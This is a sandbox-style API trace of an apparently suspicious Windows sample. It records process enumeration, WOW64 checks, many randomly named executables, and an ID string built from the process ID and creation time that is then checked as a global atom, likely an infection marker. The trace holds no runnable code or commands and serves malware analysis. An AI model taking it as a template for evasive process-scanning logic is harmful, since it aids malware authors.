	[0126.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.771] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.771] CloseHandle (hObject=0x2dc) returned 1
	[0126.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0126.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.772] CloseHandle (hObject=0x2dc) returned 1
	[0126.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0126.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.772] CloseHandle (hObject=0x2dc) returned 1
	[0126.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.773] CloseHandle (hObject=0x2dc) returned 1
	[0126.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.773] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.773] CloseHandle (hObject=0x2dc) returned 1
	[0126.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.773] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.773] CloseHandle (hObject=0x2dc) returned 1
	[0126.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.774] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.774] CloseHandle (hObject=0x2dc) returned 1
	[0126.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.774] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.774] CloseHandle (hObject=0x2dc) returned 1
	[0126.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.774] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.774] CloseHandle (hObject=0x2dc) returned 1
	[0126.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.775] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.775] CloseHandle (hObject=0x2dc) returned 1
	[0126.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0126.775] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.775] CloseHandle (hObject=0x2dc) returned 1
	[0126.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.776] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.776] CloseHandle (hObject=0x2dc) returned 1
	[0126.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.776] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.776] CloseHandle (hObject=0x2dc) returned 1
	[0126.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.776] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.776] CloseHandle (hObject=0x2dc) returned 1
	[0126.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.777] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.777] CloseHandle (hObject=0x2dc) returned 1
	[0126.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.777] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.777] CloseHandle (hObject=0x2dc) returned 1
	[0126.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0126.777] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.777] CloseHandle (hObject=0x2dc) returned 1
	[0126.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0126.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.778] CloseHandle (hObject=0x2dc) returned 1
	[0126.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.778] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetLastError () returned 0x5
	[0126.779] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.780] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0126.780] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.780] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.781] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetLastError () returned 0x5
	[0126.782] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.782] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0126.783] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.783] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0126.783] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0126.783] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0126.783] CloseHandle (hObject=0x2dc) returned 1
	[0126.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0126.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.783] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.783] CloseHandle (hObject=0x2dc) returned 1
	[0126.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.784] CloseHandle (hObject=0x2dc) returned 1
	[0126.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.784] CloseHandle (hObject=0x2dc) returned 1
	[0126.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.785] CloseHandle (hObject=0x2dc) returned 1
	[0126.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0126.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.785] CloseHandle (hObject=0x2dc) returned 1
	[0126.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0126.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.821] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.821] CloseHandle (hObject=0x2dc) returned 1
	[0126.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.822] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.822] CloseHandle (hObject=0x2dc) returned 1
	[0126.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0126.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.822] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.822] CloseHandle (hObject=0x2dc) returned 1
	[0126.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.823] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.823] CloseHandle (hObject=0x2dc) returned 1
	[0126.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.823] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.823] CloseHandle (hObject=0x2dc) returned 1
	[0126.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
